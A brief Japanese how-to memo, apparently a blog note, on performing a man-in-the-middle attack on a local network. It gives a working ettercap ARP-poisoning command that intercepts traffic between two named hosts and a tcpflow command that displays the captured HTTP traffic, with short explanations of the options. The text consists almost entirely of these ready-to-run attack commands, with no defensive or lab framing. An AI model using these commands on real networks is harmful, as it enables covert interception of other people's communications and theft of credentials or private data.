ettercapで中間者攻撃(MITM)

やり方は簡単
以下のようにして192.168.0.2,192.168.0.11間のメッセージに割り込める
ettercap -Tq -M arp /192.168.0.2/ /192.168.0.11/
インターフェイスは-Tのテキスト、-Cのcurses、-GのGtkと選べる

tcpflowで覗いてみる
tcpflow -cse -i eth0 dst port 80
-c コンソールに出力
-s 印字できないもじは.へ変換
-e カラー表示
-i インターフェイス指定